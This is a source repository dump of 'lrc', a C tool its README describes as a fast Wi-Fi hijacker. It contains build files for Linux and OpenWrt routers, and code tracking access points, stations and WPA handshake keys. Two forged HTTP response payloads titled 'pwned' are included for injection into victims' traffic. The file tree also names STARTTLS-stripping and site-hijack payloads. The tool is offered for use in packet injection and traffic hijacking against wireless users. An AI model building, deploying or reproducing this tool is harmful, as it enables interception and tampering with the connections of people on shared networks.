├── .gitignore ├── Makefile ├── Makefile.openwrt ├── README.md ├── ap.c ├── ap.h ├── content ├── ftp_resp ├── hijack_image ├── http_hijack ├── imap_no_starttls ├── imap_stoptls ├── no_ssl_please ├── pop3_stoptls ├── site_hijack ├── smtp_no_starttls └── smtp_stoptls ├── crctable.h ├── crypto.c ├── crypto.h ├── ieee80211.h ├── logger.c ├── logger.h ├── lrc.c ├── lrc.h ├── matchers.c ├── matchers.conf.sample ├── matchers.h ├── osdep ├── Makefile ├── OSDEP_CHANGES_FOR_LRC.txt ├── airpcap.c ├── airpcap.h ├── byteorder.h ├── common.c ├── common.h ├── common.mak ├── crctable_osdep.h ├── cygwin.c ├── cygwin.h ├── cygwin_tap.c ├── darwin.c ├── darwin_tap.c ├── dummy.c ├── dummy_tap.c ├── file.c ├── freebsd.c ├── freebsd_tap.c ├── linux.c ├── linux_tap.c ├── netbsd.c ├── netbsd_tap.c ├── network.c ├── network.h ├── openbsd.c ├── openbsd_tap.c ├── osdep.c ├── osdep.h ├── packed.h ├── pcap.h ├── radiotap │ ├── COPYING │ ├── Makefile │ ├── README │ ├── parse.c │ ├── platform.h │ ├── radiotap.c │ ├── radiotap.h │ └── radiotap_iter.h └── tap-win32 │ └── common.h ├── python ├── http_pornhub.py └── pyexample.py ├── test ├── test_eapol.c ├── test_pmk.c ├── test_ptk.c └── wpa2.eapol.cap ├── tqueue.c └── tqueue.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | 5 | # Libraries 6 | *.lib 7 | *.a 8 | 9 | # Shared objects (inc. Windows DLLs) 10 | *.dll 11 | *.so 12 | *.so.* 13 | *.dylib 14 | 15 | # Executables 16 | *.exe 17 | *.out 18 | *.app 19 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # 2 | # Makefile 3 | HAVE_PYTHON=1 4 | DEBUG=1 5 | 6 | CFLAGS=-O3 -Wall -D_DEFAULT_SOURCE 7 | LDFLAGS=-lpthread -lpcre -lnet -lnl-genl-3 -lnl-3 -lcrypto 8 | CC=gcc 9 | LD=ldd 10 | 11 | OBJ = logger.o tqueue.o ap.o lrc.o matchers.o crypto.o $(OSD)/lib$(OSD).a 12 | 13 | OSD = osdep 14 | LIBOSD = $(OSD)/lib$(OSD).so 15 | 16 | ifeq ($(HAVE_PYTHON),1) 17 | CFLAGS+=-DHAVE_PYTHON 18 | LDFLAGS+=-lpython2.7 19 | endif 20 | 21 | ifeq ($(DEBUG),1) 22 | CFLAGS+=-ggdb3 23 | endif 24 | 25 | all: osd lrc 26 | @echo 27 | 28 | osd: 29 | $(MAKE) -C $(OSD) 30 | 31 | $(LIBOSD): 32 | $(MAKE) -C $(OSD) 33 | 34 | lrc: $(OBJ) 35 | $(CC) -o $@ $(OBJ) ${LDFLAGS} 36 | 37 | clean: 38 | rm -f $(OBJ) lrc *~ 39 | $(MAKE) -C $(OSD) clean 40 | 41 | distclean: clean 42 | -------------------------------------------------------------------------------- /Makefile.openwrt: -------------------------------------------------------------------------------- 1 | # 2 | # Makefile 3 | # http://wiki.openwrt.org/doc/devel/crosscompile 4 | 5 | HAVE_PYTHON=0 6 | DEBUG=1 7 | 8 | TARGET_DIR=/home/invent/alfa/15.05_buildroot/openwrt/staging_dir/target-mips_34kc_uClibc-0.9.33.2 9 | TOOLCHAIN_DIR=/home/invent/alfa/15.05_buildroot/openwrt/staging_dir/toolchain-mips_34kc_gcc-4.8-linaro_uClibc-0.9.33.2 10 | 11 | # Needs to be defined as env 12 | STAGING_DIR=$(TOOLCHAIN_DIR) 13 | 14 | CFLAGS=-O3 -Wall -D_DEFAULT_SOURCE -I$(TOOLCHAIN_DIR)/usr/include -I$(TARGET_DIR)/usr/include -static 15 | LDFLAGS=-L$(TOOLCHAIN_DIR)/usr/lib -L$(TARGET_DIR)/usr/lib -lpthread -lpcre -lnet -lnl-genl-3 -lnl-3 -lcrypto 16 | CC=$(TOOLCHAIN_DIR)/bin/mips-openwrt-linux-uclibc-gcc 17 | LD=$(TOOLCHAIN_DIR)/bin/mips-openwrt-linux-uclibc-ld 18 | 19 | export STAGING_DIR 20 | export TARGET_DIR 21 | export TOOLCHAIN_DIR 22 | export LD 23 | export CC 24 | 25 | OBJ = logger.o tqueue.o ap.o lrc.o matchers.o crypto.o $(OSD)/lib$(OSD).a 26 | 27 | OSD = osdep 28 | LIBOSD = $(OSD)/lib$(OSD).so 29 | 30 | ifeq ($(HAVE_PYTHON),1) 31 | CFLAGS+=-DHAVE_PYTHON 32 | LDFLAGS+=-lpython2.7 33 | endif 34 | 35 | ifeq ($(DEBUG),1) 36 | CFLAGS+=-ggdb3 37 | endif 38 | 39 | all: osd lrc 40 | @echo 41 | 42 | osd: 43 | $(MAKE) -C $(OSD) 44 | 45 | $(LIBOSD): 46 | $(MAKE) -C $(OSD) 47 | 48 | lrc: $(OBJ) 49 | $(CC) -o $@ $(OBJ) ${LDFLAGS} 50 | 51 | clean: 52 | rm -f $(OBJ) lrc *~ 53 | $(MAKE) -C $(OSD) clean 54 | 55 | distclean: clean 56 | 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | lrc 2 | === 3 | 4 | Fast Wi-Fi hijacker in C, based on AirPwn ideas. 5 | 6 | apt-get install libnl-3-dev libnl-genl-3-dev libnet1-dev libpcap-dev libssl-dev 7 | 8 | -------------------------------------------------------------------------------- /ap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "ap.h" 6 | #include "logger.h" 7 | 8 | struct ap_info *ap_lookup(struct ctx *ctx, const u_char *bssid) 9 | { 10 | struct ap_info *ap_cur = ctx->ap_list; 11 | while (ap_cur != NULL) { 12 | if (!memcmp (ap_cur->bssid, bssid, 6)) { 13 | break; 14 | } 15 | ap_cur = ap_cur->next; 16 | } 17 | return ap_cur; 18 | } 19 | 20 | 21 | int ap_add (struct ctx *ctx, const u_char *bssid, const char *essid, int crypt_type, int channel) 22 | { 23 | 24 | struct ap_info *ap_cur; 25 | 26 | if (ap_lookup (ctx, bssid)) { // ap already exist 27 | return 0; 28 | } 29 | 30 | logger(INFO, "Adding new AP [%02X:%02X:%02X:%02X:%02X:%02X] %s Crypt: %d Channel: %d", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid, crypt_type, channel); 31 | 32 | ap_cur = (struct ap_info *) malloc (sizeof (struct ap_info)); 33 | if (!ap_cur) { 34 | logger(WARN, "ap_add: malloc failed"); 35 | return 0; 36 | } 37 | 38 | memset (ap_cur, 0, sizeof (struct ap_info)); 39 | memcpy (ap_cur->bssid, bssid, 6); 40 | strcpy ((char *) ap_cur->essid, essid); 41 | ap_cur->crypt_type = crypt_type; 42 | 43 | ap_cur->next = ctx->ap_list; 44 | ctx->ap_list = ap_cur; 45 | 46 | return 1; 47 | } 48 | 49 | void ap_list_destroy (struct ctx *ctx) 50 | { 51 | struct ap_info *ap_cur, *ap_next; 52 | ap_cur = ctx->ap_list; 53 | 54 | while (ap_cur) { 55 | ap_next = ap_cur->next; 56 | free (ap_cur); 57 | ap_cur = ap_next; 58 | } 59 | } 60 | 61 | 62 | struct sta_info *sta_lookup (struct ctx *ctx, const u_char *sta_mac) 63 | { 64 | struct sta_info *sta_cur = ctx->sta_list; 65 | while (sta_cur != NULL) { 66 | if (!memcmp (sta_cur->sta_mac, sta_mac, 6)) { 67 | break; 68 | } 69 | sta_cur = sta_cur->next; 70 | } 71 | return sta_cur; 72 | } 73 | 74 | 75 | struct sta_info * sta_add (struct ctx *ctx, const u_char *sta_mac) 76 | { 77 | struct sta_info *sta_cur; 78 | logger(INFO, "Adding new STA [%02X:%02X:%02X:%02X:%02X:%02X]", sta_mac[0], sta_mac[1], sta_mac[2], sta_mac[3], sta_mac[4], sta_mac[5]); 79 | sta_cur = (struct sta_info *) malloc (sizeof (struct sta_info)); 80 | if (!sta_cur) { 81 | logger(WARN, "sta_add: malloc failed"); 82 | return NULL; 83 | } 84 | 85 | memset (sta_cur, 0, sizeof(struct sta_info)); 86 | memcpy (sta_cur->sta_mac, sta_mac, 6); 87 | sta_cur->qos_flag = 0; 88 | sta_cur->next = ctx->sta_list; 89 | ctx->sta_list = sta_cur; 90 | return sta_cur; 91 | } 92 | 93 | 94 | void sta_list_destroy (struct ctx *ctx) 95 | { 96 | struct sta_info *sta_cur, *sta_next; 97 | sta_cur = ctx->sta_list; 98 | 99 | while (sta_cur) { 100 | sta_next = sta_cur->next; 101 | free (sta_cur); 102 | sta_cur = sta_next; 103 | } 104 | } 105 | 106 | -------------------------------------------------------------------------------- /ap.h: -------------------------------------------------------------------------------- 1 | #ifndef __AP_H__ 2 | #define __AP_H__ 3 | 4 | #include "lrc.h" 5 | 6 | struct ap_info { 7 | u_char bssid[6]; 8 | #define MAX_IE_ELEMENT_SIZE 256 9 | u_char essid[MAX_IE_ELEMENT_SIZE]; 10 | #define CRYPT_TYPE_OPEN 0 11 | #define CRYPT_TYPE_WEP 1 12 | #define CRYPT_TYPE_WPA 2 13 | #define CRYPT_TYPE_WPA_MGT 3 14 | int crypt_type; 15 | int channel; 16 | char *password; 17 | u_char pmk[40]; 18 | struct ap_info *next; 19 | }; 20 | 21 | struct wpa_info { 22 | u_char stmac[6]; 23 | u_char snonce[32]; 24 | u_char anonce[32]; 25 | u_char keymic[16]; 26 | u_char eapol[256]; 27 | u_char ptk[80]; 28 | int eapol_size; 29 | #define EAPOL_VERSION_CCMP 2 30 | #define EAPOL_VERSION_TKIP 1 31 | int keyver; 32 | #define EAPOL_STATE_PROCESSING 10 33 | #define EAPOL_STATE_CAN_RENEW 0 34 | #define EAPOL_STATE_COMPLETE 7 35 | int state; 36 | }; 37 | 38 | struct sta_info { 39 | struct ap_info *ap; 40 | u_char sta_mac[6]; 41 | u_char qos_flag; 42 | u_char qos_header[2]; 43 | struct wpa_info wpa; 44 | struct sta_info *next; 45 | }; 46 | 47 | int ap_add (struct ctx *, const u_char *, const char *, int, int); 48 | struct ap_info *ap_lookup (struct ctx *, const u_char *); 49 | struct sta_info *sta_lookup (struct ctx *, const u_char *); 50 | struct sta_info * sta_add (struct ctx *, const u_char *); 51 | 52 | #endif 53 | -------------------------------------------------------------------------------- /content/ftp_resp: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | Content-Length: 2000 5 | 6 | pwned 7 | 8 | 9 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 11 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 29 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 30 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 31 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 32 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 33 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 34 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 35 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 36 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 37 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 38 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 39 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 40 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 41 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 42 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 44 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 45 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 46 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 47 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 48 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 49 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 50 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 51 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 52 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 53 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 54 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 55 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 56 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 57 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 58 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 59 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 60 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 61 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 63 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 64 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 65 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 66 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 67 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 68 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 69 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 70 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 71 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 72 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 73 | 74 | 75 | -------------------------------------------------------------------------------- /content/hijack_image: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | Content-Length: 2000 5 | 6 | pwned 7 | 8 | 9 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 11 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 29 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 30 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 31 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 32 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 33 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 34 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 35 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 36 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 37 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 38 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 39 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 40 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 41 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 42 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 44 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 45 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 46 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 47 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 48 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 49 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 50 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 51 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 52 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 53 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 54 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 55 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 56 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 57 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 58 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 59 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 60 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 61 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 63 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 64 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 